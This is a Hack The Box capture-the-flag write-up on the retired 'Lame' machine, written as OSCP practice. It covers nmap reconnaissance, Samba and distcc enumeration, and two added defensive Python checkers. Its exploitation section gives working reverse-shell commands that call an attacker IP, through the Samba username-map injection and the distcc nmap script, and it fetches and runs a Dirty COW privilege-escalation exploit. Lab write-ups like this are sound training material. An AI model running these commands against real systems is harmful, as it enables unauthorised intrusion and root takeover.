Hack The Box: Lame Write-up (#1)
Hi there! This is my first write-up on HTB retired VMs. Firstly, I would like to thank the two infosec professionals who are my great inspiration for writing this blog, Rana Khalil and TheCyberMentor. Please do visit their Twitter for awesome updates. I am doing these write-ups in preparation for the OSCP certification, based on TJ_Null's OSCP-like VMs list.
I will start with the Linux boxes (first column) in the list, from Lame to Mango, and will then continue with the Windows boxes. This will be a series of write-ups, and new write-ups will be released whenever the list gets updated. I have included my hacking methodology in this write-up (it will be included in every upcoming write-up): #1 Reconnaissance, #2 Service Enumeration, #3 Exploitation and #4 Attack Strategy Map. This will help you keep track of your activity. Please enjoy the rest of the contents.
Reconnaissance
Let's start with a quick nmap scan.
nmap -sC -sV -O -oA nmap/basic 10.10.10.3
- -sC: Run the default nmap scripts
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in all 3 formats (normal, XML and grepable)
We got the following results:
- Port 21 — Running FTP service of version 2.3.4
- Port 22 — Running SSH service of version OpenSSH 4.7p1
- Port 139,445 — Running SMB service of version Samba 3.0.20-Debian
It is always good to run a full nmap scan to leave no stone unturned. Let's do that as well.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.3
- -p-: Scan all ports from 1 to 65535
We got the following results:
- Port 3632 — Running the distributed compiler daemon (distccd) version 1. This port did not show up in the quick nmap scan, so it is good to run a full scan.
The last scan we need to cover is the UDP scan. Let’s run the nmap scan for this:
nmap -sU -O -p- -oA nmap/udp 10.10.10.3
We got the following results:
As we can see, all the UDP ports are either closed or filtered.
Now we have 4 potential ports to enumerate in the next step.
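As an added example (not from the original write-up), the script below parses the grepable output that -oA writes and diffs the quick scan against the full scan, which is exactly how port 3632 would surface. The two .gnmap lines are constructed from the results listed above and are not real scan output.

```python
import re

# Constructed .gnmap lines modelled on the quick (nmap/basic) and full (-p-)
# scans of 10.10.10.3 described above; not genuine nmap output.
BASIC_GNMAP = (
    "Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/"
    "\tIgnored State: closed (996)\n"
)
FULL_GNMAP = (
    "Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/, "
    "3632/open/tcp//distccd//distccd v1/"
    "\tIgnored State: closed (65530)\n"
)

# One gnmap port entry: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: {port: (state, proto, service, version)}} for open ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab (Ignored State follows it).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open":
                hosts.setdefault(host, {})[int(port)] = (state, proto, service, version.strip())
    return hosts


def new_ports(baseline, full, host):
    """Open ports present in the full scan but absent from the baseline scan."""
    base = baseline.get(host, {})
    return {p: v for p, v in full.get(host, {}).items() if p not in base}


if __name__ == "__main__":
    extra = new_ports(parse_gnmap(BASIC_GNMAP), parse_gnmap(FULL_GNMAP), "10.10.10.3")
    for port, (_, proto, service, version) in sorted(extra.items()):
        print(f"missed by quick scan: {port}/{proto} {service} {version}")
```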
Service Enumeration
In this phase, we enumerate the ports and their services to find any misconfiguration or vulnerable version.
Port 21 vsftpd 2.3.4
A quick Google search revealed that this version of the FTP software is vulnerable to remote command execution, and most of the exploitation is done via the Metasploit Framework. We are not going to use that method, to keep ourselves within the OSCP exam standard. From the basic nmap scan result, we can see that anonymous access is allowed. So let's try it.
Nothing much of interest can be found here. Let's use the nmap vulnerability script to check whether this version of the FTP service is vulnerable. The scripts can be found in their default location:
ls -1 /usr/share/nmap/scripts/ftp*
Let's execute this script against our target machine on port 21.
nmap -p 21 10.10.10.3 --script ftp-vsftpd-backdoor.nse
The result shows that this version of FTP is not vulnerable, so let's move to the next one in the list.
Port 22 OpenSSH 4.7p1
I always leave SSH service enumeration as the last option, when nothing else seems to open a door to the target. A quick search on this version didn't give much info. Let's move to the next.
Port 139 and 445 Samba 3.0.20-Debian
These ports most of the time give you anonymous access and open a door to the target.
Let's try the basic enumeration with smbclient and smbmap to list the shares and the shares' permissions, respectively.
smbclient -L 10.10.10.3
- -L: Get a list of shares available on a host
smbmap -H 10.10.10.3
- -H: IP of the host
Great! We have one share with read and write permission. After googling this version of Samba for vulnerabilities, we found one suitable CVE which works on Linux systems, CVE-2007-2447. The exploit is here. Basically, the weakness is in how the smb.conf username map script option handles the username: the username supplied by the client is passed to a shell unsanitised. All we need to do is change the username used for authentication to:
username = "/=`nohup <our payload comes here>`"
Let's keep this in mind. Later, in the exploitation phase, we will test this exploit. We proceed to the last port.
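As an added defensive example (not part of the original write-up), the check below flags the smb.conf directive that CVE-2007-2447 depends on and spots usernames carrying the "/=`...`" pattern shown above. The configuration fragment and the script path in it are constructed for illustration.

```python
import re

# Constructed smb.conf fragment: the 'username map script' line is the setting
# that CVE-2007-2447 abuses (a stock smb.conf does not set it).
SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; the line below hands the client-supplied username to /bin/sh
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""

# Shell metacharacters a Samba username never legitimately needs; the
# CVE-2007-2447 trigger wraps its command in backticks after a "/=" prefix.
SHELL_META = re.compile(r"[`$;&|<>(){}\n]")


def is_suspicious_username(name):
    """True if a username looks like a shell-injection attempt."""
    return name.startswith("/=") or bool(SHELL_META.search(name))


def audit_smb_conf(text):
    """Return (line number, value) for every 'username map script' directive."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blank lines, comments (# or ;), section headers and non-assignments.
        if not line or line[0] in "#;[" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower().split() == ["username", "map", "script"]:
            findings.append((lineno, value))
    return findings


if __name__ == "__main__":
    for lineno, value in audit_smb_conf(SMB_CONF):
        print(f"smb.conf line {lineno}: username map script = {value} (remove or patch Samba)")
    for name in ("alice", "/=`nohup true`"):  # constructed test usernames
        print(f"{name!r}: {'suspicious' if is_suspicious_username(name) else 'ok'}")
```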
Port 3632 Distccd version 1
A Google search on this port and service reveals that it is vulnerable to remote code execution. Nmap has a script to check for the distcc vulnerability.
We can confirm this by running the nmap script with the following command:
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse
Excellent! It is vulnerable. Refer to CVE-2004-2687 for more info. This can be exploited using the nmap script as mentioned here.
It's time to exploit! Let's get down to business.
Exploitation
#1 Samba
Set up a Netcat listener on your Kali Linux.
nc -nlvp 4444
Log in to Samba:
smbclient //10.10.10.3/tmp
Then run the logon command below:
logon "/=`nohup nc -nv 10.10.14.3 4444 -e /bin/sh`"
Note: Please change the IP above to your Kali Linux IP.
We successfully received a reverse shell from the Lame box.
Grab the root flag.
Grab the user flag.
#2 Distcc
Set up a Netcat listener on your Kali Linux.
nc -nlvp 4444
Execute the command below on your Kali Linux.
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.3 4444 -e /bin/bash'"
Now we have a reverse shell from the Lame box. If you notice, the user is daemon.
We need to escalate this unprivileged user to root. Alright, things are getting interesting. I googled for kernel 2.6.24 and got this exploit from Exploit DB.
The exploit can be downloaded from searchsploit in your Kali Linux.
Set up a simple Python web server (default port 8000) on your Kali Linux to transfer this exploit to the Lame box.
python3 -m http.server
From the Lame box, download this exploit.
wget http://10.10.14.3:8000/40839.c
Note: Please change the above IP to your Kali Linux IP.
Next, #1 you need to compile this code as mentioned in the exploit, and #2 you need to execute the newly created binary.
So let’s compile:
gcc -pthread 40839.c -o dirty -lcrypt
Execute the newly created binary.
./dirty <your new password type here>
So what happened here? If you have read this exploit, it basically backs up the existing passwd file to the /tmp/ directory and then creates a new passwd file with a user 'firefart' that has root privileges.
The code executed successfully. We can confirm this by SSHing from our Kali Linux to the Lame box as the 'firefart' user.
ssh firefart@10.10.10.3
We have solved this machine in 2 different ways. Nice!
Attack Strategy Map
Thank you for reading. Next box is the Beep.